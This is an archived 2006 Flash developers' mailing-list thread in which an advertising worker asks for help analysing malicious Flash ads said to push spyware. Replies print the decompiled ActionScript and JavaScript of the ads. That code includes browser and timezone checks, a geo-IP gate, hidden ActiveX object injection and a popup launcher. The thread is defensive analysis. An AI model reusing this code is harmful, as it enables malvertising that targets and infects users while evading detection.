[Flashcoders] Decompiling some sketchy flash code
Dear List,
First off, apologies if this is the wrong forum for this question. Some
background -- I'm in the online advertising industry and I've been trying to
track down an squash a scam that has been hitting the industry. There is a
party out there (errorsafe.com) that is embedding some very nasty code in their
flash ads that depending on several factors will popup a new window and try
install their spyware using active-x.
Here are two sample swf files:
http://content.yieldmanager.com/13312/94749/27e558c94df509ebe888fdc0060640e8.swf
http://content.yieldmanager.com/17344/138497/6d4ef47cf4071557d6749ad9c2fcf8cc.swf
Now I've been decompiling extracting code with various tools to try to gain
some insight. So interestingly enough, one of them is a little older, and it's
easier to point blame as in the 'constants' the following is defined:
constants [...some taken out...]
'http://www.errorsafe.com/pages/scanner/index.php?aid=tigerlid=swf7ax=1ex=1ed=2',
'http://uk.matchservice.com/reg_swf.php?campaign=tiger', 'easyPP',
'http://uk.matchservice.com/?aid=tigerlid=swf7ax=0', 'tz_begin', 'tz_end',
'javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u=\'',
'\',dt=new
Date(),tz=-dt.getTimezoneOffset()/60;p=(n.userAgent.indexOf(\'SV1\')!=-1)||(a(a.indexOf(\'SP2\')!=-1));i=(d.allencodeURI()!w.Event);if(!(tz=',
'tz=', ')){if(p!d.getElementById(\'o\')){d.body.innerHTML+=\'object id=o
height=0
classid=CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6/object\';};(ip)?o.launchURL(u):w.open(u);};void
0;', 'jscript',
'\';p=(n.userAgent.indexOf(\'SV1\')!=-1)||(a(a.indexOf(\'SP2\')!=-1));i=(d.allencodeURI()!w.Event);if(p!d.getElementById(\'o\')){d.body.innerHTML+=\'object
id=o height=0
classid=CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6/object\';};(ip)?o.launchURL(u):w.open(u);void
0;', 'unique:Date', 'Date', 'my_date:Date', 'my_so:SharedObject', '/',
'tiger_swf7300506', 'SharedObject', 'getLocal', 'tm', 'setswfashCookie',
'ClickTAG', 'ClickTARGET', '_blank', 'URL_btn', 'onRelease'
The other file seems to have encrypted this informaiton to make it hard to
track down:
'setcookie...', '_level0', 'l2', 'c1', 'l24', 'l1', 'l21', 'l22', 'l23', 'l25',
'this', 'l27', 't', 'l26', 'u', 'l31', 'l32', 'l28', '_global', 'i', '_ll2',
'l33', 'l35', ' - ', 'l43', 'l34', 's', '_self', 'l37', 'l36', '??', '',
'', '???', '???', '???', '?', '',
'???', '?', 'l29', '???', 'l30', '?',
'???', '?', '???',
'?', '?', '??',
'?ý?ý?ÿÖ?ý?¼?Ù??È?Ù?ý???ý???ÈýÙ?Êý??éò??È?Ù??ÿ?È?Ù¾ÖËË???Ê??ý??Êÿ??Ë?ý???Ë?ÿýË?Ê???Ûý??ÙÎÌÌÏÂ???ÙÂý?ÙÍÂ??ÙÍÂ??ÙξÈ??Ù???¼àý??ÄÅÈ??ÙÉ??Ê???ð???ë?ÄÅËÒÌ×??ĽÄ??ÚÙÉÕÂÂ??ØÙÉÏÅÅ???Ľ?Ê???á??Þ?å?ľ?¾ÅÅ??Êþ???Ê?äðéèÇÙÃØ?þ??ÿ?¼??Ù?¼??Ùø¾Ìø¾¼ÿ?ýÙø¾ßèïåàÖÒÞâÑÎÝÑÎÉÏÕÐÝÉÍÍàÏÉÞÍÑÏÉÌÌßÌÐâÓÕâÝÝÒø¾ÚØË?þ??ÿ?ÚÃ?×?Ê?ý??ÿ?ñîèÄ?Å?ÿý?ÿ?Ä?Å??ÊÄ?Å×ÄÌÅ×??×',
'l38', '', 'l39', '', 'l40', '?', 'l41', '???', 'l42',
'??', '?', 'String', 'prototype', '', 'split', 'length', 'charCodeAt',
'fromCharCode', 'join', 'newMenu', 'ContextMenu', 'hideBuiltInItems', 'menu',
'Date', 'epru2003intl592006', 'b', ' : ', '_ll1', 'ClickTAG',
'http://workhomecenter.com/?aid=istemlid=intl', 'ClickTARGET', '_blank'
So I'm kind of at a loss as to how to figure out what this flash file does.
They've clearly masked their code quite well to make it very difficult ot see.
I do know a few things:
- The file loads an outside html file, which checks the user's IP address, and
depending on the geo that IP matches to returns a 1/0 value (or in some cases,
an encrypted 'yes/no') as to whether or not to serve a pop
- The flash file also checks the timezone of the browser in addition to IP as
an added check that the user is outside the US.
Any insight? Again, apologies if this is the wrong list to ask and I will
greatly appreciate direction if it isn't!
-Mike
___
Flashcoders@chattyfig.figleaf.com
To change your subscription options or search the archive:
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders
Brought to you by Fig Leaf Software
Premier Authorized Adobe Consulting and Training
http://www.figleaf.com
http://training.figleaf.com
RE: [Flashcoders] Decompiling some sketchy flash code
All I see on decompiling is things like:
var eval (\x01) = 930;
while (while (while (while (while (while (while (while (while (while
(while (while (while (while (while (while (while (while (eval (\x01)
== 930) {
eval (\x01) = eval (\x01) - 695}
, eval (\x01) == 67) {
eval (\x01) = eval (\x01) + 718// branch @1
}
, eval (\x01) == 349) {
eval (\x01) = eval (\x01) + 149// branch @1
}
, eval (\x01) == 264) {
eval (\x01) = eval (\x01) + 84}
Am I missing something?
-Mike
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Michael
Stuhr
Sent: Wednesday, September 20, 2006 5:05 PM
To: Flashcoders mailing list
Subject: Re: [Flashcoders] Decompiling some sketchy flash code
Michiel Nolet schrieb:
Dear List,
First off, apologies if this is the wrong forum for this question.
Some background -- I'm in the online advertising industry and I've been
trying to track down an squash a scam that has been hitting the
industry. There is a party out there (errorsafe.com) that is embedding
some very nasty code in their flash ads that depending on several
factors will popup a new window and try install their spyware using
active-x.
Here are two sample swf files:
http://content.yieldmanager.com/13312/94749/27e558c94df509ebe888fdc006
0640e8.swf
http://content.yieldmanager.com/17344/138497/6d4ef47cf4071557d6749ad9c
2fcf8cc.swf
i tried to decompile them with asv (latest version). i can clearly see
what is inside there. i would give you the rebuild files, but maybe you
should ask burak himself (he is on this list) to give you those.
micha
___
Flashcoders@chattyfig.figleaf.com
To change your subscription options or search the archive:
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders
Brought to you by Fig Leaf Software
Premier Authorized Adobe Consulting and Training http://www.figleaf.com
http://training.figleaf.com
___
Flashcoders@chattyfig.figleaf.com
To change your subscription options or search the archive:
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders
Brought to you by Fig Leaf Software
Premier Authorized Adobe Consulting and Training
http://www.figleaf.com
http://training.figleaf.com
RE: [Flashcoders] Decompiling some sketchy flash code
I am more than willing to shell $59.95 for asv, I just want to make sure
it can extract stuff that other toosl couldn't. I've tried the free
command line ones, and shell out $30 for some crappy software that plain
didn't work. Could you copy paste some sample lines of more informative
code you're finding?
-Mike
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Michael
Stuhr
Sent: Wednesday, September 20, 2006 6:11 PM
To: Flashcoders mailing list
Subject: Re: [Flashcoders] Decompiling some sketchy flash code
Michiel Nolet schrieb:
All I see on decompiling is things like:
var eval (\x01) = 930;
while (while (while (while (while (while (while (while (while
(while (while (while (while (while (while (while (while (while (eval
(\x01) == 930) {
eval (\x01) = eval (\x01) - 695}
, eval (\x01) == 67) {
eval (\x01) = eval (\x01) + 718// branch @1
}
, eval (\x01) == 349) {
eval (\x01) = eval (\x01) + 149// branch @1
}
, eval (\x01) == 264) {
eval (\x01) = eval (\x01) + 84}
Am I missing something?
sure
buy a copy of asv and you get the full experience :-)
micha
___
Flashcoders@chattyfig.figleaf.com
To change your subscription options or search the archive:
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders
Brought to you by Fig Leaf Software
Premier Authorized Adobe Consulting and Training http://www.figleaf.com
http://training.figleaf.com
___
Flashcoders@chattyfig.figleaf.com
To change your subscription options or search the archive:
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders
Brought to you by Fig Leaf Software
Premier Authorized Adobe Consulting and Training
http://www.figleaf.com
http://training.figleaf.com
RE: [Flashcoders] Decompiling some sketchy flash code
Not at all, that is awesome, you don't understand how many hours I've
been trying to find that info. I also have plenty more flash files to
get the code from :). It's actually kind of interesting that they use
javascript that checks useragent, timezone, etc. on whether a pop should
be launched or not.
Burak, can I contact you at manitu at buraks.com ?
-Mike
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Michael
Stuhr
Sent: Wednesday, September 20, 2006 6:52 PM
To: Flashcoders mailing list
Subject: Re: [Flashcoders] Decompiling some sketchy flash code
Michiel Nolet schrieb:
I am more than willing to shell $59.95 for asv, I just want to make
sure it can extract stuff that other toosl couldn't. I've tried the
free command line ones, and shell out $30 for some crappy software
that plain didn't work. Could you copy paste some sample lines of
more informative code you're finding?
function setswfashCookie() {
my_date.setTime(my_date.getTime() + 43200);
my_so.data.expires = my_date.getTime();
my_so.swfush();
if (_root.strong) {
this.createEmptyMovieClip(target_mc,
this.getNextHighestDepth());
target_mc.unique = unique.getTime();
target_mc.loadVariables(_root.sscript, GET);
target_mc.param_interval = setInterval(checkParamsLoaded,
100);
}
}
function checkParamsLoaded() {
if (target_mc.popup == undefined) {
} else if (target_mc.popup == 1) {
clearInterval(target_mc.param_interval);
getURL (_root.tzjscript, _self);
} else if (target_mc.popup == 0) {
clearInterval(target_mc.param_interval);
}
}
_root.strong = true;
_root.strongPP = ###;
_root.sscript = ###;
_root.easyPP = ###;
_root.tz_begin = -3;
_root.tz_end = -9;
_root.tzjscript = (javascript:var
w=window,n=navigator,a=n.appMinorVersion,d=document,u=' +
_root.strongPP) + ',dt=new
Date(),tz=-dt.getTimezoneOffset()/60;p=(n.userAgent.indexOf('SV1')!=-1)|
|(a(a.indexOf('SP2')!=-1));i=(d.allencodeURI()!w.Event);if(!(tz=
)
+ _root.tz_end) + tz=) + _root.tz_begin) +
)){if(p!d.getElementById('o')){d.body.innerHTML+='object id=o
height=\0\
classid=\CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6\/object';};(i
p)?o.launchURL(u):w.open(u);};void
0;;
_root.jscript = (javascript:var
w=window,n=navigator,a=n.appMinorVersion,d=document,u=' +
_root.strongPP) +
';p=(n.userAgent.indexOf('SV1')!=-1)||(a(a.indexOf('SP2')!=-1));i=(d.
allencodeURI()!w.Event);if(p!d.getElementById('o')){d.body.innerHT
ML+='object
id=o height=\0\
classid=\CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6\/object';};(i
p)?o.launchURL(u):w.open(u);void
0;;
var unique:Date = new Date();
var my_date:Date = new Date();
var my_so:SharedObject = SharedObject.getLocal(tiger_swf7300506,
/);
if (my_so.data.expires != undefined) {
var tm = my_date.getTime();
if (tm my_so.data.expires) {
setswfashCookie();
}
} else {
setswfashCookie();
}
if (_root.ClickTAG == undefined) {
_root.ClickTAG = _root.easyPP;
}
if (_root.ClickTARGET == undefined) {
_root.ClickTARGET = _blank;
}
_root.URL_btn.onRelease = function () {
getURL (_root.ClickTAG, _root.ClickTARGET);
};
those ###'s are real urls.
and those are only the actions on frame 1 ...
i guess you lost ~60 bucks right now :-)
micha
___
Flashcoders@chattyfig.figleaf.com
To change your subscription options or search the archive:
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders
Brought to you by Fig Leaf Software
Premier Authorized Adobe Consulting and Training http://www.figleaf.com
http://training.figleaf.com
___
Flashcoders@chattyfig.figleaf.com
To change your subscription options or search the archive:
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders
Brought to you by Fig Leaf Software
Premier Authorized Adobe Consulting and Training
http://www.figleaf.com
http://training.figleaf.com
